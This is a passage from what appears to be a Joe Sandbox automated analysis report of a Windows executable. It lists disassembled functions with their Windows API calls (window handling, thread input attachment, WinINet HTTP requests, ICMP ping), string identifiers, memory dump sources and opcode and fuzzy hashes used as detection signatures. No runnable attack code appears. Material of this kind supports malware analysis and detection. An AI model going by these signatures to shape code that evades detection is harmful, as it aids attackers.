                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                            • String ID: Ping
                                            • API String ID: 1028309954-2246546115
                                            • Opcode ID: 0ccbc3fc3c1fbae8998116d25995f7c3dee95cb9e7677f4604aa463c4ce65daa
                                            • Instruction ID: 62938851ac504f8ca109cd87804d55f62cbb56aad9f3825f244d98e9e4638ecc
                                            • Opcode Fuzzy Hash: 0ccbc3fc3c1fbae8998116d25995f7c3dee95cb9e7677f4604aa463c4ce65daa
                                            • Instruction Fuzzy Hash: A6518F316047049FD720AF68CC45B6ABBE5FF48711F04895AFA99E72E1DB70E849CB42
                                            Function 0084E389 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0084E396
                                            • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0084E40C
                                            • GetLastError.KERNEL32 ref: 0084E416
                                            • SetErrorMode.KERNEL32(00000000,READY), ref: 0084E483
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Error$Mode$DiskFreeLastSpace
                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                            • API String ID: 4194297153-14809454
                                            • Opcode ID: 50455d62fc990e02220b5cffe4a5bae2c58798727dc146772c804b0e41a41bb3
                                            • Instruction ID: 0452d34ee7c2bbb0b0e72c44c54c4e12e2c0e6c4f32b5420401427d2e1cd16bf
                                            • Opcode Fuzzy Hash: 50455d62fc990e02220b5cffe4a5bae2c58798727dc146772c804b0e41a41bb3
                                            • Instruction Fuzzy Hash: 88318F35A0060DAFDB01EFA8CD95AADBBB4FF08304F148025E505EB2D1DB74AA01CB96
                                            Function 0083B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0083B98C
                                            • GetDlgCtrlID.USER32 ref: 0083B997
                                            • GetParent.USER32 ref: 0083B9B3
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0083B9B6
                                            • GetDlgCtrlID.USER32(?), ref: 0083B9BF
                                            • GetParent.USER32(?), ref: 0083B9DB
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0083B9DE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1383977212-1403004172
                                            • Opcode ID: 3c5e659022b2a0b1f8593d4545175c52d0571e6f48294bec197d367a25a097d5
                                            • Instruction ID: c57ee32371bb1f588a04210fda3a1b0e581c82fc665eb8590f289f17043b36de
                                            • Opcode Fuzzy Hash: 3c5e659022b2a0b1f8593d4545175c52d0571e6f48294bec197d367a25a097d5
                                            • Instruction Fuzzy Hash: AC2192B4900208AFDB04EFA8DC96EBEBB75FB95310F100215FA51D72E1EB7458159BA0
                                            Function 0083B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0083BA73
                                            • GetDlgCtrlID.USER32 ref: 0083BA7E
                                            • GetParent.USER32 ref: 0083BA9A
                                            • SendMessageW.USER32(00000000,?,00000111,?), ref: 0083BA9D
                                            • GetDlgCtrlID.USER32(?), ref: 0083BAA6
                                            • GetParent.USER32(?), ref: 0083BAC2
                                            • SendMessageW.USER32(00000000,?,?,00000111), ref: 0083BAC5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: MessageSend$CtrlParent
                                            • String ID: ComboBox$ListBox
                                            • API String ID: 1383977212-1403004172
                                            • Opcode ID: 9f5e3de639205310f89d31065213fef93de88c9cfdc94c05c5dcd6ad66a1f2fc
                                            • Instruction ID: 149f0038fcf3566681a5581f423d01f3d929245e99e82c36c88367e54862f902
                                            • Opcode Fuzzy Hash: 9f5e3de639205310f89d31065213fef93de88c9cfdc94c05c5dcd6ad66a1f2fc
                                            • Instruction Fuzzy Hash: EB21B0B4A00208AFDB00EF68CC85EFEBB74FB44300F000115F951D72D1EB7958159BA0
                                            Function 0083BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetParent.USER32 ref: 0083BAE3
                                            • GetClassNameW.USER32(00000000,?,00000100), ref: 0083BAF8
                                            • _wcscmp.LIBCMT ref: 0083BB0A
                                            • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0083BB85
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ClassMessageNameParentSend_wcscmp
                                            • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                            • API String ID: 1704125052-3381328864
                                            • Opcode ID: 547f0c2a20c9d1cab8c4d901d76ffff7c8ac1d3bf49a1e46ab93d5db50f61467
                                            • Instruction ID: e32d3cb71f58d724e3d5bb6c65d5c093840597d992f87a0c4c6fef843b7d2a82
                                            • Opcode Fuzzy Hash: 547f0c2a20c9d1cab8c4d901d76ffff7c8ac1d3bf49a1e46ab93d5db50f61467
                                            • Instruction Fuzzy Hash: 99110AB664C317FAFA206628EC17DA6B79CFF61334F200011FA14E51D6FF6568514594
                                            Function 0085B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • VariantInit.OLEAUT32(?), ref: 0085B2D5
                                            • CoInitialize.OLE32(00000000), ref: 0085B302
                                            • CoUninitialize.OLE32 ref: 0085B30C
                                            • GetRunningObjectTable.OLE32(00000000,?), ref: 0085B40C
                                            • SetErrorMode.KERNEL32(00000001,00000029), ref: 0085B539
                                            • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0085B56D
                                            • CoGetObject.OLE32(?,00000000,0088D91C,?), ref: 0085B590
                                            • SetErrorMode.KERNEL32(00000000), ref: 0085B5A3
                                            • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0085B623
                                            • VariantClear.OLEAUT32(0088D91C), ref: 0085B633
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                            • String ID:
                                            • API String ID: 2395222682-0
                                            • Opcode ID: 86a61ae5d0a617a3c71d3fa3d9e15cd265efd1c764bab7f65b4906c9e5c489f8
                                            • Instruction ID: 65ef1e0d712f876b1b37f7cd38bd047f57ad1146f3c04eb77ce272fc0cd18a3e
                                            • Opcode Fuzzy Hash: 86a61ae5d0a617a3c71d3fa3d9e15cd265efd1c764bab7f65b4906c9e5c489f8
                                            • Instruction Fuzzy Hash: D3C11271608305AFC704EF68C88496ABBE9FF98349F00491DF98ADB251DB71ED09CB52
                                            Function 008467E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • __swprintf.LIBCMT ref: 008467FD
                                            • __swprintf.LIBCMT ref: 0084680A
                                              • Part of subcall function 0082172B: __woutput_l.LIBCMT ref: 00821784
                                            • FindResourceW.KERNEL32(?,?,0000000E), ref: 00846834
                                            • LoadResource.KERNEL32(?,00000000), ref: 00846840
                                            • LockResource.KERNEL32(00000000), ref: 0084684D
                                            • FindResourceW.KERNEL32(?,?,00000003), ref: 0084686D
                                            • LoadResource.KERNEL32(?,00000000), ref: 0084687F
                                            • SizeofResource.KERNEL32(?,00000000), ref: 0084688E
                                            • LockResource.KERNEL32(?), ref: 0084689A
                                            • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 008468F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                            • String ID:
                                            • API String ID: 1433390588-0
                                            • Opcode ID: ea7595d897cc1b17f2e58e5324019c2db8aaabe2b0067444751939f68044bb4c
                                            • Instruction ID: 630ca46cf6af3ea26d74240bc455ef6ceb471067b3d2e2c7fb799fd3ea42c0a1
                                            • Opcode Fuzzy Hash: ea7595d897cc1b17f2e58e5324019c2db8aaabe2b0067444751939f68044bb4c
                                            • Instruction Fuzzy Hash: 35316E7190021EABDF119F60ED59EBABBA8FF09341B104425F912E2191E734E961DB61
                                            Function 00844025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetCurrentThreadId.KERNEL32 ref: 00844047
                                            • GetForegroundWindow.USER32(00000000,?,?,?,?,?,008430A5,?,00000001), ref: 0084405B
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 00844062
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008430A5,?,00000001), ref: 00844071
                                            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00844083
                                            • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,008430A5,?,00000001), ref: 0084409C
                                            • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,008430A5,?,00000001), ref: 008440AE
                                            • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,008430A5,?,00000001), ref: 008440F3
                                            • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,008430A5,?,00000001), ref: 00844108
                                            • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,008430A5,?,00000001), ref: 00844113
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                            • String ID:
                                            • API String ID: 2156557900-0
                                            • Opcode ID: 1b775e97c386a54628200eaec8a9eaae88eceafbb34d5bca9016dbe6661d4fec
                                            • Instruction ID: 7895c9a005a591489ba34878613b5a39d921d3b530c46dfde9b0dd44f3fb4a7d
                                            • Opcode Fuzzy Hash: 1b775e97c386a54628200eaec8a9eaae88eceafbb34d5bca9016dbe6661d4fec
                                            • Instruction Fuzzy Hash: 64316071500208AFDB10EF58DC89FAD77BAFB68351F10D116F906E6291DBB4DE818BA4
                                            Function 0087DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetSysColor.USER32(00000008), ref: 0081B496
                                            • SetTextColor.GDI32(?,000000FF), ref: 0081B4A0
                                            • SetBkMode.GDI32(?,00000001), ref: 0081B4B5
                                            • GetStockObject.GDI32(00000005), ref: 0081B4BD
                                            • GetClientRect.USER32(?), ref: 0087DD63
                                            • SendMessageW.USER32(?,00001328,00000000,?), ref: 0087DD7A
                                            • GetWindowDC.USER32(?), ref: 0087DD86
                                            • GetPixel.GDI32(00000000,?,?), ref: 0087DD95
                                            • ReleaseDC.USER32(?,00000000), ref: 0087DDA7
                                            • GetSysColor.USER32(00000005), ref: 0087DDC5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                            • String ID:
                                            • API String ID: 3430376129-0
                                            • Opcode ID: 6beb7920c88e0a53055c4c2cacf51064ccb885d67a27dd9806b464a8858839c1
                                            • Instruction ID: d1589397e6114b678c30ee99a2ecbb4b463a0548e88c71be096b1702a60c5da4
                                            • Opcode Fuzzy Hash: 6beb7920c88e0a53055c4c2cacf51064ccb885d67a27dd9806b464a8858839c1
                                            • Instruction Fuzzy Hash: E1114C31500305EFDB216BA8EC48FE97BB5FF15325F108665FA6AD50E2DB314981DB20
                                            Function 0083CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                            Download Yara Rule
                                            APIs
                                            • EnumChildWindows.USER32(?,0083CF50), ref: 0083CE90
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ChildEnumWindows
                                            • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                            • API String ID: 3555792229-1603158881
                                            • Opcode ID: 103c7a954278f29c14d43cdf0983764f39e6cad1ed7689736fade2055c803d83
                                            • Instruction ID: 7c91e2e281ca8b66a7c514e331e460b01001a7ae8a0177966135accd530fb4b2
                                            • Opcode Fuzzy Hash: 103c7a954278f29c14d43cdf0983764f39e6cad1ed7689736fade2055c803d83
                                            • Instruction Fuzzy Hash: 1D91B43060020A9BCB58EFA4C881BEAFB75FF44314F508519E959F7291DF30699ACBD1
                                            Function 00803093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                            Download Yara Rule
                                            APIs
                                            • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008030DC
                                            • CoUninitialize.OLE32(?,00000000), ref: 00803181
                                            • UnregisterHotKey.USER32(?), ref: 008032A9
                                            • DestroyWindow.USER32(?), ref: 00875079
                                            • FreeLibrary.KERNEL32(?), ref: 008750F8
                                            • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00875125
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                            • String ID: close all
                                            • API String ID: 469580280-3243417748
                                            • Opcode ID: a0c11a77210f1c6c0581757023d95ea6deb787a7689e4a895559b966a56a6764
                                            • Instruction ID: 7bce0a5a3489e68598a60cbb3e796e593e7c1812ae6631cf31571f2f0f092634
                                            • Opcode Fuzzy Hash: a0c11a77210f1c6c0581757023d95ea6deb787a7689e4a895559b966a56a6764
                                            • Instruction Fuzzy Hash: 62915A70200606DFC745EF18CC96A68F3A8FF14305F5482A9E50AE72A2DF30AE66CF55
                                            Function 0081CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            • SetWindowLongW.USER32(?,000000EB), ref: 0081CC15
                                              • Part of subcall function 0081CCCD: GetClientRect.USER32(?,?), ref: 0081CCF6
                                              • Part of subcall function 0081CCCD: GetWindowRect.USER32(?,?), ref: 0081CD37
                                              • Part of subcall function 0081CCCD: ScreenToClient.USER32(?,?), ref: 0081CD5F
                                            • GetDC.USER32 ref: 0087D137
                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0087D14A
                                            • SelectObject.GDI32(00000000,00000000), ref: 0087D158
                                            • SelectObject.GDI32(00000000,00000000), ref: 0087D16D
                                            • ReleaseDC.USER32(?,00000000), ref: 0087D175
                                            • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0087D200
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                            • String ID: U
                                            • API String ID: 4009187628-3372436214
                                            • Opcode ID: 8f63d490e90be70fbb6badbbab3ea1c537a3ae2a9aeed74c98a402c79162c8ea
                                            • Instruction ID: 1cb90d0796643ea41da6bddee1caab45f2b9d38c09cfc980d02c2890e17e687f
                                            • Opcode Fuzzy Hash: 8f63d490e90be70fbb6badbbab3ea1c537a3ae2a9aeed74c98a402c79162c8ea
                                            • Instruction Fuzzy Hash: 5971C030500309DFCF219F68C885AEA7BB5FF59324F148269ED59DA2AAD731CC81DB60
                                            Function 0086ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                              • Part of subcall function 0081B63C: GetCursorPos.USER32(000000FF), ref: 0081B64F
                                              • Part of subcall function 0081B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0081B66C
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000001), ref: 0081B691
                                              • Part of subcall function 0081B63C: GetAsyncKeyState.USER32(00000002), ref: 0081B69F
                                            • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0086ED3C
                                            • ImageList_EndDrag.COMCTL32 ref: 0086ED42
                                            • ReleaseCapture.USER32 ref: 0086ED48
                                            • SetWindowTextW.USER32(?,00000000), ref: 0086EDF0
                                            • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0086EE03
                                            • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0086EEDC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                            • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                            • API String ID: 1924731296-2107944366
                                            • Opcode ID: b193b92e0371db531f776bacc755377b8c4ae45059ff059302bcd9bc3c88f345
                                            • Instruction ID: ae3378d63cee1c2be5c7dc2fa3992fbe5e3316a7ac429193baab4698578d006e
                                            • Opcode Fuzzy Hash: b193b92e0371db531f776bacc755377b8c4ae45059ff059302bcd9bc3c88f345
                                            • Instruction Fuzzy Hash: 5E51A974204300AFDB00EF28DC9AFAA77E8FB98704F004A1DF995972E2DB719954CB52
                                            Function 008545C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 008545FF
                                            • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0085462B
                                            • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0085466D
                                            • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00854682
                                            • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0085468F
                                            • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 008546BF
                                            • InternetCloseHandle.WININET(00000000), ref: 00854706
                                              • Part of subcall function 00855052: GetLastError.KERNEL32(?,?,008543CC,00000000,00000000,00000001), ref: 00855067
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                            • String ID:
                                            • API String ID: 1241431887-3916222277
                                            • Opcode ID: 8a13ee01cfdf349b4b561b2a7b43f912b4c79f065538ff19cb0997c04c1a8b7b
                                            • Instruction ID: 607d3f196f20e1c0657ccf2465544dd058deec2fc4922ca42d453828968a621e
                                            • Opcode Fuzzy Hash: 8a13ee01cfdf349b4b561b2a7b43f912b4c79f065538ff19cb0997c04c1a8b7b
                                            • Instruction Fuzzy Hash: 8D418CB1501209BFEB119F54CC89FBB77ACFF1931AF005016FE05DA185E7B099888BA4
                                            Function 0085B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                            Download Yara Rule
                                            APIs
                                            • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0089DC00), ref: 0085B715
                                            • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0089DC00), ref: 0085B749
                                            • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0085B8C1
                                            • SysFreeString.OLEAUT32(?), ref: 0085B8EB
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
